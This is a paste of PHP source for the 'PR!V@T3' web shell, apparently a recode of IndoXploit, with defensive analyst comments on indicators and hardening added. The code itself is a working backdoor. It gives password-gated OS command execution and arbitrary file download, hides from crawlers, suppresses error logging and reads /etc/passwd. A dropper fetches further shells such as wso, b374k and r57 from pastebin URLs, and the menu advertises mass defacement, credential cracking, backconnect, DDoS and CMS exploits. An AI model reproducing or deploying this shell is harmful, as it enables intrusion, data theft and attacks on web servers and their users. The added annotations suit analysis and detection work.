VanGans

PR!V@T3 shell

Oct 23rd, 2018
  1. <?php
// Analyst note: bootstrap of a PHP web shell (page title "PR!V@T3 shell").
// $auth_pass is an unsalted MD5 digest that is compared with md5($_POST['pass']) further down.
// The trailing comment publishes the default password, so the digest is useful as a static
// indicator for file scanning but offers no real access control on an unmodified copy.
$auth_pass = "39d5b4a1417ba23b28b5a87aae5aa9c0"; // default: pr!v@t3
session_start();
// Error reporting is switched off and the execution time limit removed for this request.
error_reporting(0);
set_time_limit(0);
// set_magic_quotes_runtime() no longer exists from PHP 7.0 on, which suggests the sample was
// written for PHP 5.x hosts — confirm against the runtime of the affected server.
@set_magic_quotes_runtime(0);
@clearstatcache();
// Anti-forensics: error_log is cleared and log_errors disabled, so PHP writes no error-log
// entries for requests handled by this file. Web-server access logs, process telemetry and
// file-integrity monitoring are the evidence sources that remain.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
  13.  
  14. if(isset($_GET['bom'])){
// Analyst note: these statements sit inside the `if(isset($_GET['bom']))` block opened on the
// previous line, so they only run when the request carries a `bom` query parameter. The end of
// that block is outside this excerpt.
// Hunting lead: access-log entries for a .php path whose query string contains `bom`.
$color = "#00ff00";
$default_action = 'Files';
$default_use_ajax = true;
$default_charset = 'UTF-8';
// Crawler cloaking: a User-Agent matching any of these names (case-insensitive) receives a bare
// 404 and the script stops, which keeps the page out of search-engine indexes. A scanner that
// announces a crawler-style User-Agent gets the same 404, so verification of a suspected copy
// should rely on file-system inspection rather than on the HTTP response alone.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
  26.  
/**
 * Prints the password prompt and ends the request.
 *
 * The output is a static HTML page: title "PR!V@T3", an ASCII-art banner, one password field
 * named "pass" posted back to the same URL, and a footer "Copyright (c) <year> - pr!v@t3".
 * Takes no parameters and never returns, because the function finishes with exit.
 *
 * Analyst note: the title, the banner and the footer text are fixed strings, which makes them
 * usable as response-body and file-content indicators when hunting for copies of this sample.
 */
function login_shell() {
?>
<html>
<head>
<title>PR!V@T3</title>
<style type="text/css">
html {
margin:0;
background-color: black;
color: green;
cursor:crosshair;
}
header {
color: green;
margin: 10px auto;
cursor:crosshair;
}
input[type=password] {
width: 250px;
height: 25px;
color: red;
background: #000000;
border: 1px solid #ffffff;
padding: 5px;
margin-left: 20px;
text-align: center;
cursor:crosshair;
}
#logo1{
text-align:center;
padding-left:50px;
color:red;
}
</style>
</head>
<pre id="logo1"><strong>
#
# ,--. ,--. ,---.,-----.,--. ,--.,--------. ,---. ,------. ,-----.
# | ,'.| | / || .--'| '--' |'--. .--' ,-----. ' .-' | .---'' .--./
# | |' ' |/ ' |'--. `\| .--. | | | '-----' `. `-. | `--, | |
# | | ` |'--| |.--' /| | | | | | .-' || `---.' '--'\
# `--' `--' `--'`----' `--' `--' `--' `-----' `------' `-----'
# ,--. ,--. ,--. ,--. ,--.,--. ,--. ,--.
# | | | | ,---. | |-. ,---. | ,---. ,---. | || | ,--. ,--./ | / |
# | |.'.| || .-. :| .-. '( .-' | .-. || .-. :| || | \ `' / `| | `| |
# | ,'. |\ --.| `-' |.-' `)| | | |\ --.| || | \ / | |.--.| |
# '--' '--' `----' `---' `----' `--' `--' `----'`--'`--' `--' `--''--'`--'
#
</strong></pre>
<form method="post">
<center><input type="password" name="pass"><center>
</form>
<br>
<center><?php echo " Copyright &copy; ".date('Y')." - pr!v@t3"; ?></center>
<?php
// Stops the request here, so nothing after the call site runs for an unauthenticated visitor.
exit;
}
// Authentication gate. The session flag is keyed by md5() of the Host header, which is a value
// supplied by the client. The flag is set when $auth_pass is empty (no password at all) or when
// the MD5 of the posted "pass" field equals $auth_pass; otherwise the login page is shown and
// the request ends inside login_shell().
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
login_shell();

// File download handler: `file=<path>&act=download` streams the named path back as an
// attachment. The path comes straight from the query string and is not restricted, so any
// file readable by the PHP process can leave the host this way.
// Detection: GET requests carrying `act=download`, answered with
// `Content-Type: application/octet-stream` and a Content-Disposition attachment header.
// Hardening: open_basedir and least-privilege file permissions for the web-server account
// limit what such a handler can read.
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
  103. ?>
  104. <html>
  105. <head>
  106. <title>PR!V@T3</title>
  107. <meta name='name' content='PR!V@T3 shell v1.1'>
  108. <meta name='name' content='n45ht shell v1.1'>
  109. <meta name='author' content='FRU_403'>
  110. <meta name='author' content='FRU_403 From Storm Cyber Army - N45HT'>
  111. <meta name='info' content='IndoXploit WebShell Recoded By FRU_403'>
  112. <meta name='Thanks' content='Extreme Crew - Storm Cyber Army - IndoXploit - Mr.P-teo - BackBox Team - N45HT - iTeens - Defacer Tersakiti Team'>
  113. <meta charset="UTF-8">
  114. <style type='text/css'>
  115. html {
  116. background-color:black;
  117. font-family: 'Ubuntu';
  118. font-size: 13px;
  119. width: 100%;
  120. cursor:crosshair;
  121. }
  122. li {
  123. display: inline;
  124. cursor:crosshair;
  125. }
  126. table, th, td {
  127. border-collapse:collapse;
  128. font-family: Tahoma, Geneva, sans-serif;
  129. background: transparent;
  130. cursor:crosshair;
  131. }
  132. .table_home, .th_home, .td_home {
  133. border: 1px solid white;
  134. cursor:crosshair;
  135. }
  136. th {
  137. padding: 10px;
  138. cursor:crosshair;
  139. }
  140. a {
  141. color: white;
  142. text-decoration: none;
  143. cursor:crosshair;
  144. }
  145. a:hover {
  146. color: white;
  147. text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
  148. text-decoration:none;
  149. cursor:crosshair;
  150. }
  151. b {
  152. color: white;
  153. cursor:crosshair;
  154. }
  155. input[type=text], input[type=password],input[type=submit] {
  156. background: transparent;
  157. color: white;
  158. border: 1px solid white;
  159. margin: 5px auto;
  160. padding-left: 5px;
  161. font-family: 'Ubuntu';
  162. font-size: 13px;
  163. cursor:crosshair;
  164. }
  165. textarea {
  166. border: 1px solid white;
  167. width: 100%;
  168. height: 400px;
  169. padding-left: 5px;
  170. margin: 10px auto;
  171. resize: none;
  172. background: transparent;
  173. color: white;
  174. font-family: 'Ubuntu';
  175. font-size: 13px;
  176. cursor:crosshair;
  177. }
  178. select {
  179. width: 152px;
  180. background: #000000;
  181. color: lime;
  182. border: 1px solid white;
  183. margin: 5px auto;
  184. padding-left: 5px;
  185. font-family: 'Ubuntu';
  186. font-size: 13px;
  187. cursor:crosshair;
  188. }
  189. option:hover {
  190. background: lime;
  191. color: #000000;
  192. cursor:crosshair;
  193. }
  194. *{
  195. text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
  196. font-size:11px;
  197. font-family:Tahoma,Verdana,Arial;
  198. color:white;
  199. cursor:crosshair;
  200. }
  201. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid white; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px white;-moz-box-shadow: 0px 4px 2px white;}
  202. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: white;font-size:25px;text-shadow: 5px 5px 5px black;}
  203. .infoweb {
  204. border-right: 1px solid green;
  205. cursor:crosshair;
  206. }
  207. a:hover{
  208. text-decoration:none;
  209. cursor:crosshair;
  210. }
  211. div #menu li:hover {cursor:pointer;
  212. cursor:crosshair;
  213. }
  214. div#menu ul {
  215. margin:1px 1px 1px 1px;padding:0;float:left;
  216. cursor:crosshair;
  217. }
  218. div#menu li {
  219. position:relative;display:block;float:left;
  220. cursor:crosshair;
  221. }
  222. div#menu li:hover>ul {
  223. left:0px;
  224. cursor:crosshair;
  225. }
  226. div#menu a{
  227. margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid white;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:white;
  228. cursor:crosshair;
  229. }
  230. div#menu a:hover{
  231. text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
  232. text-decoration:none;
  233. cursor:crosshair;
  234. }
  235. div#menu ul ul {
  236. margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
  237. cursor:crosshair;
  238. }
  239. div#menu ul ul a {
  240. margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:white;
  241. cursor:crosshair;
  242. }
  243. .output {
  244. margin:auto;border:2px solid white;width:100%;height:400px;background:none;padding:0 2px;
  245. cursor:crosshair;
  246. }
  247. .cmdbox {
  248. width:100%;
  249. cursor:crosshair;
  250. }
  251. </style>
  252. </head>
  253. <?php
  254.  
  255. function w($dir,$perm) {
  256. if(!is_writable($dir)) {
  257. return "<font color=red>".$perm."</font>";
  258. } else {
  259. return "<font color=lime>".$perm."</font>";
  260. }
  261. }
  262. function r($dir,$perm) {
  263. if(!is_readable($dir)) {
  264. return "<font color=red>".$perm."</font>";
  265. } else {
  266. return "<font color=lime>".$perm."</font>";
  267. }
  268. }
/**
 * Runs an operating-system command as the web-server account and returns its output.
 *
 * Analyst note: this is the command-execution primitive of the shell. It tries system(),
 * exec(), passthru() and shell_exec() in that order and uses the first one for which
 * function_exists() is true. When none of them is available it falls off the end and returns
 * nothing. In the exec() branch the output lines are joined without line breaks.
 *
 * Detection: child processes spawned by the web server or PHP worker (process-creation
 * telemetry, auditd execve rules on the web user).
 * Hardening: disable_functions covering these four functions, together with their relatives
 * such as proc_open and popen, removes this path; the page's own menu advertises a
 * "Disable Functions" bypass, so that setting should not be the only control.
 *
 * @param string $cmd Command line passed unchanged to the PHP execution function.
 * @return string|null Captured output, or no value when no execution function is available.
 */
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
  293. function perms($file){
  294. $perms = fileperms($file);
  295. if (($perms & 0xC000) == 0xC000) {
  296. // Socket
  297. $info = 's';
  298. } elseif (($perms & 0xA000) == 0xA000) {
  299. // Symbolic Link
  300. $info = 'l';
  301. } elseif (($perms & 0x8000) == 0x8000) {
  302. // Regular
  303. $info = '-';
  304. } elseif (($perms & 0x6000) == 0x6000) {
  305. // Block special
  306. $info = 'b';
  307. } elseif (($perms & 0x4000) == 0x4000) {
  308. // Directory
  309. $info = 'd';
  310. } elseif (($perms & 0x2000) == 0x2000) {
  311. // Character special
  312. $info = 'c';
  313. } elseif (($perms & 0x1000) == 0x1000) {
  314. // FIFO pipe
  315. $info = 'p';
  316. } else {
  317. // Unknown
  318. $info = 'u';
  319. }
  320. // Owner
  321. $info .= (($perms & 0x0100) ? 'r' : '-');
  322. $info .= (($perms & 0x0080) ? 'w' : '-');
  323. $info .= (($perms & 0x0040) ?
  324. (($perms & 0x0800) ? 's' : 'x' ) :
  325. (($perms & 0x0800) ? 'S' : '-'));
  326. // Group
  327. $info .= (($perms & 0x0020) ? 'r' : '-');
  328. $info .= (($perms & 0x0010) ? 'w' : '-');
  329. $info .= (($perms & 0x0008) ?
  330. (($perms & 0x0400) ? 's' : 'x' ) :
  331. (($perms & 0x0400) ? 'S' : '-'));
  332. // World
  333. $info .= (($perms & 0x0004) ? 'r' : '-');
  334. $info .= (($perms & 0x0002) ? 'w' : '-');
  335. $info .= (($perms & 0x0001) ?
  336. (($perms & 0x0200) ? 't' : 'x' ) :
  337. (($perms & 0x0200) ? 'T' : '-'));
  338. return $info;
  339. }
  340. function hdd($s) {
  341. if($s >= 1073741824)
  342. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  343. elseif($s >= 1048576)
  344. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  345. elseif($s >= 1024)
  346. return sprintf('%1.2f',$s / 1024 ) .' KB';
  347. else
  348. return $s .' B';
  349. }
  350. function ambilKata($param, $kata1, $kata2){
  351. if(strpos($param, $kata1) === FALSE) return FALSE;
  352. if(strpos($param, $kata2) === FALSE) return FALSE;
  353. $start = strpos($param, $kata1) + strlen($kata1);
  354. $end = strpos($param, $kata2, $start);
  355. $return = substr($param, $start, $end - $start);
  356. return $return;
  357. }
/**
 * Fetches a URL with cURL and returns the response body.
 *
 * Redirects are followed, and TLS peer and host verification are both switched off, so the
 * server's certificate is not checked.
 *
 * Analyst note: this is the outbound HTTP helper used by bing() below. Outbound web requests
 * that originate from the web-server process are an egress signal worth alerting on where the
 * application has no reason to make them.
 *
 * @param string $url Address to request.
 * @return string|bool Response body, or the failure value of curl_exec().
 */
function getsource($url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
$content = curl_exec($curl);
curl_close($curl);
return $content;
}
/**
 * Pages through Bing search results for a query and prints the unique host names found.
 *
 * The loop requests result pages in steps of 10 up to offset 30000 and stops earlier when a
 * request fails or the page holds no link to the next offset. Host names are taken from the
 * third "/"-separated part of each result URL, de-duplicated and echoed one per line.
 * $lll, $linksuiv and $sss are assigned but not used afterwards.
 *
 * Analyst note: this is the search-engine lookup behind the shell's target-discovery
 * features. On a compromised host it shows up as repeated requests from the web server to
 * www.bing.com/search with an increasing `first=` parameter.
 *
 * @param string $dork Search query, appended to the URL as given.
 * @return void Output is echoed.
 */
function bing($dork) {
$npage = 1;
$npages = 30000;
$allLinks = array();
$lll = array();
while($npage <= $npages) {
$x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
if($x) {
preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
$npage = $npage + 10;
if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
} else break;
}
$URLs = array();
foreach($allLinks as $url){
$exp = explode("/", $url);
$URLs[] = $exp[2];
}
$array = array_filter($URLs);
$array = array_unique($array);
$sss = count(array_unique($array));
foreach($array as $domain) {
echo $domain."\n";
}
}
/**
 * Sends an address to the lookup endpoint at domains.yougetsignal.com and prints each entry
 * of the reply as an http:// URL.
 *
 * The reply is flattened by stripping brackets, braces and quotes with nested str_replace()
 * calls, split on ",,", and the first element is discarded. Output is flushed after every
 * line.
 *
 * Analyst note: a POST from the web-server process to domains.yougetsignal.com/domains.php is
 * a network indicator for this feature; the endpoint name suggests a reverse-IP lookup used
 * to list other sites on the same address.
 *
 * @param string $url Address placed in the `remoteAddress` form field.
 * @return void Output is echoed.
 */
function reverse($url) {
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset($array[0]);
foreach($array as $lnk) {
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo $lnk."\n";
ob_flush();
flush();
}
curl_close($ch);
}
// Legacy input handling: when magic quotes are active, slashes are stripped recursively from
// $_POST and $_COOKIE ($_GET is left as it is). get_magic_quotes_gpc() was removed in PHP 8.0,
// another sign that the sample targets old PHP installations.
if(get_magic_quotes_gpc()) {
function ec_ss($array) {
return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
}
$_POST = ec_ss($_POST);
$_COOKIE = ec_ss($_COOKIE);
}
/**
 * Second-stage dropper: when the `create` query parameter equals $names, stores remote content
 * as priv_tools/<names>.php and redirects the browser to it.
 *
 * If the file already exists the function only emits the redirect script. Otherwise it
 * creates the directory priv_tools with mode 0777, downloads $lokasi with file_get_contents()
 * and writes the result with a .php extension. Nothing checks what was downloaded.
 * $a, $b and $c are assigned but never used, and $_GET['create'] is read without isset().
 *
 * Analyst note — indicators and controls:
 *  - a world-writable directory named priv_tools next to the shell, holding .php files;
 *  - outbound fetches from the web server to the URLs passed in by the calls that follow;
 *  - allow_url_fopen=Off, egress filtering for the web tier and file-integrity monitoring on
 *    the document root each interrupt or reveal this step.
 *
 * @param string $names  Tool name; also the file name written under priv_tools/.
 * @param string $lokasi Source location read with file_get_contents().
 * @return void
 */
function BuatTools($names,$lokasi){
if ( $_GET['create'] == $names ){
$a= "".$_SERVER['SERVER_NAME']."";
$b= dirname($_SERVER['PHP_SELF']);
$c = "/priv_tools/".$names.".php";
if (file_exists('priv_tools/'.$names.'.php')){
echo '<script type="text/javascript">alert("Done");window.location.href = "priv_tools/'.$names.'.php";</script> ';
}
else {mkdir("priv_tools", 0777);
file_put_contents('priv_tools/'.$names.'.php', file_get_contents($lokasi));
echo ' <script type="text/javascript">alert("Done");window.location.href = "priv_tools/'.$names.'.php";</script> ';}}}
  431.  
// Registry of second-stage payloads. Every call runs on each request, but a download only
// happens for the entry whose name equals the `create` query parameter.
// Analyst note: the first argument is the file name written as priv_tools/<name>.php, and the
// second is the remote source. Both make usable indicators: the file names for disk sweeps,
// the URLs for proxy and DNS logs. Treat any file found under priv_tools/ as hostile.
BuatTools("wso","http://pastebin.com/raw/3eh3Gej2");
// NOTE(review): the two strings below are joined with "." rather than separated by ",", so
// this call passes a single argument and supplies no $lokasi.
BuatTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
BuatTools("b374k","http://pastebin.com/raw/rZiyaRGV");
BuatTools("injection","http://pastebin.com/raw/nxxL8c1f");
BuatTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
BuatTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
BuatTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
BuatTools("tokopedia","http://pastebin.com/dvhzWgby");
BuatTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
BuatTools("mailer","http://pastebin.com/raw/9yu1DmJj");
BuatTools("r57","http://pastebin.com/raw/G2VEDunW");
BuatTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
BuatTools("extractor","http://pastebin.com/raw/jQnMFHBL");
BuatTools("bh","http://pastebin.com/raw/3L2ESWeu");
BuatTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  447.  
// Working directory: the `folder` query parameter is handed straight to chdir(), so the
// operator can browse any directory the PHP process may enter. open_basedir narrows this.
if(isset($_GET['folder'])) {
$dir = $_GET['folder'];
chdir($dir);
} else {
$dir = getcwd();
}
// Host fingerprinting shown in the header panel: kernel string, resolved server address,
// disk usage, PHP restrictions and available tooling.
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
// Subtracts the formatted strings returned by hdd(), so the "used" figure is not reliable.
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
// Detection: each page load runs `wget --help`, `perl --help` and `python --help` through
// exe(). A web-server or PHP worker process spawning these three commands in quick succession
// is a distinctive process-telemetry pattern.
$wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
$perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
$python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
$show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
// Account the script runs as: POSIX lookups when available, otherwise the script owner's
// name and ids with the group shown as "?".
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
// Shared-hosting reconnaissance: reads /etc/named.conf and /etc/passwd, then counts the
// `zone "..."` entries in named.conf to report how many domains the server hosts.
// $users is loaded here but not used in the lines visible in this excerpt.
// Detection: file-access auditing on /etc/named.conf for the web-server account.
// Hardening: open_basedir and file permissions that keep these files from the web user.
$d0mains = @file("/etc/named.conf");
$users=@file('/etc/passwd');
if($d0mains)
{
// Bare expression with no effect; $count is first given a value by $count++ below.
$count;
foreach($d0mains as $d0main)
{
// ereg() was removed in PHP 7.0.
if(@ereg("zone",$d0main))
{
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2)
{
flush();
$count++;
}
}
}
}
// Header panel: prints the values collected above (kernel, account, disk, domain count, port,
// safe_mode, disable_functions, tooling), the server address and the visitor's address.
// All values are echoed without HTML escaping.
$port=$_SERVER['SERVER_PORT'];
echo "<table>";
echo "<td class=infoweb>";
echo "System: <font color=lime>".$kernel."</font><br>";
echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
echo "Websites :<font color=lime> $count </font> Domains <br>";
echo "Port :<font color=lime> $port</font> <br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "Current DIR: ";
// Breadcrumb: one link per path segment, each pointing at `?bom&folder=<path up to it>`.
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?bom&folder=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
echo "</td><td style='width:13.5%'>";
echo "&nbsp;Server IP: <font color=lime>".$ip."</font><br>&nbsp;Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
echo "<br><br>";
// HOME, KILL (`do=kill`, the self-delete branch further down) and LOGOUT links.
echo " &nbsp;<a href='?bom' style='border:1px solid white;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>
&nbsp;<a href='?bom&do=kill' style='border:1px solid white;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>
&nbsp;<a href='?bom&logout=true' style='color:red;border:1px solid white;width:90px;margin:0px;padding:0px 8px 0px 8px;'>LOGOUT</a>
&nbsp";
echo "</td></table>";
echo "<hr>";
// Navigation menu. Every entry links back to this script with `bom`, the current `folder` and
// a `do=<feature>` value; the dispatcher after this block compares $_GET['do'] against such
// values (upload, kill and mysql are visible in this excerpt; the rest presumably follow).
// $dir comes from the `folder` query parameter and is interpolated without escaping.
// Analyst note: the labels list what the operator can do from this page: file management,
// command execution, config harvesting, mass mail and defacement, credential cracking,
// backconnect, DDoS and a set of CMS exploit modules. The `do=` values combined with the `bom`
// parameter are distinctive query strings to search for in web-server access logs.
echo "
<table>
<tr>
<div id='menu'>
<ul class=menu>
<li><a href='?bom&folder=$dir'>Files</a></li>
<li><a href='?bom&folder=$dir&do=cmd'>Command</a></li>
<li><a>Config & Symlink</a>
<ul>
<li><a href='?bom&folder=$dir&do=config' style='background-color:black'>&nbsp;Config</a></li>
<li><a href='?bom&folder=$dir&do=lcf' style='background-color:black'>&nbsp;LiteSpeed</a></li>
<li><a href='?bom&folder=$dir&do=convh' style='background-color:black'>&nbsp;Config vhosts</a></li>
<li><a href='?bom&folder=$dir&do=symser' style='background-color:black'>&nbsp;Symlink Server</a></li>
</ul>
</li>
<li><a>Mass</a>
<ul>
<li><a href='?bom&folder=$dir&do=mass_mail' style='background:black'>&nbsp;Mass Mailer</a></li>
<li><a href='?bom&folder=$dir&do=mass_deface' style='background:black'>&nbsp;Mass Deface</a></li>
<li><a href='?bom&folder=$dir&do=mass_helper' style='background:black'>&nbsp;Mass Helper</a></li>
<li><a href='?bom&folder=$dir&do=mass_delete' style='background:black'>&nbsp;Mass Delete</a></li>
</ul>
</li>
<li><a href='?bom&folder=$dir&do=domains'>Domains</a></li>
<li><a href='?bom&folder=$dir&do=upload'>Upload</a></li>
<li><a>Grab/Crack</a>
<ul>
<li><a href='?bom&folder=$dir&do=cpanel' style='background-color:black'>&nbsp;Cpanel Cracker</a></li>
<li><a href='?bom&folder=$dir&do=smtp' style='background-color:black'>&nbsp;SMTP Grabber</a></li>
</ul>
</li>
<li><a>Bypass</a>
<ul>
<li><a href='?bom&folder=$dir&do=etcpler' style='background-color:black'>&nbsp;etc/passw</a></li>
<li><a href='?bom&folder=$dir&do=bypass' style='background-color:black'>&nbsp;Disable&nbsp;Functions</a></li>
</ul>
</li>
<li><a>Auto Tools</a>
<ul>
<li><a href='?bom&folder=$dir&do=auto_edit_user' style='background-color:black'>&nbsp;Auto Edit User</a></li>
<li><a href='?bom&folder=$dir&do=auto_wp' style='background-color:black'>&nbsp;Auto WordPress</a></li>
<li><a href='?bom&folder=$dir&do=auto_dwp' style='background-color:black'>&nbsp;Auto Deface WP</a></li>
<li><a href='?bom&folder=$dir&do=auto_dwp2' style='background-color:black'>&nbsp;Deface WP v.2</a></li>
</ul>
</li>
<li><a>Tools</a>
<ul>
<li><a href='?bom&folder=$dir&do=fake_root' style='background-color:black'>&nbsp;Fake Root</a></li>
<li><a href='?bom&folder=$dir&do=network' style='background-color:black'>&nbsp;Backconnect</a></li>
<li><a href='?bom&folder=$dir&do=mysql' style='background-color:black'>&nbsp;Mysql Interface</a></li>
<li><a href='?bom&folder=$dir&do=adminer' style='background-color:black'>&nbsp;Adminer</a></li>
<li><a href='?bom&folder=$dir&do=cgi' style='background-color:black'>&nbsp;Cgi Telnet</a></li>
<li><a href='?bom&folder=$dir&do=zoneh' style='background-color:black'>&nbsp;Zone-H</a></li>
<li><a href='?bom&folder=$dir&do=defacerid' style='background-color:black'>&nbsp;Defacer.id</a></li>
</ul>
<li><a>Tools V2</a>
<ul>
<li><a href='?bom&folder=$dir&do=boom' style='background-color:black'>&nbsp;Ngindex</a></li>
<li><a href='?bom&folder=$dir&do=jumping' style='background-color:black'>&nbsp;Jumping</a></li>
<li><a href='?bom&folder=$dir&do=ddos' style='background-color:black'>&nbsp;DDOS Attack</a></li>
<li><a href='?bom&folder=$dir&do=lh' style='background-color:black'>&nbsp;Log Hunter</a></li>
<li><a href='?bom&folder=$dir&do=sc' style='background-color:black'>&nbsp;Shell Checker</a></li>
<li><a href='?bom&folder=$dir&do=sf' style='background-color:black'>&nbsp;Shell Finder</a></li>
</ul>
</li>
<li><a href='?bom&folder=$dir&do=rdp'>Create RDP</a></li>
<li><a>Exploit</a>
<ul>
<li><a href='?bom&folder=$dir&do=lokmed_login_shell' style='background-color:black'>&nbsp;Lokomedia</a></li>
<li><a href='?bom&folder=$dir&do=sqli_scanner' style='background-color:black'>&nbsp;SQLI Scanner</a></li>
<li><a href='?bom&folder=$dir&do=popoji_add_admin' style='background-color:black'>&nbsp;Popoji</a></li>
<li><a href='?bom&folder=$dir&do=tevolution' style='background-color:black'>&nbsp;Tevolution</a></li>
<li><a href='?bom&folder=$dir&do=u-design_exploit' style='background-color:black'>&nbsp;U-Design</a></li>
<li><a href='?bom&folder=$dir&do=u-design_dorker' style='background-color:black'>&nbsp;U-Design Dorker</a></li>
<li><a href='?bom&folder=$dir&do=magento' style='background-color:black'>&nbsp;Magento</a></li>
</ul>
</li>
<li><a>Exploits</a>
<ul>
<li><a href='?bom&folder=$dir&do=drupal' style='background-color:black'>&nbsp;Drupal Mass</a></li>
<li><a href='?bom&folder=$dir&do=binchecker' style='background-color:black'>&nbsp;Checker</a></li>
</ul>
</li>
<li><a>Encrypter</a>
<ul>
<li><a href='?bom&folder=$dir&do=hash' style='background-color:black'>&nbsp;Hash</a></li>
<li><a href='?bom&folder=$dir&do=string' style='background-color:black'>&nbsp;Encoder&Decoder</a></li>
</ul>
</li>
<li><a href='?bom&folder=$dir&do=tentang' style='background-color:black'>&nbsp;About</a></li>
</ul>
</div></tr><br><br>";
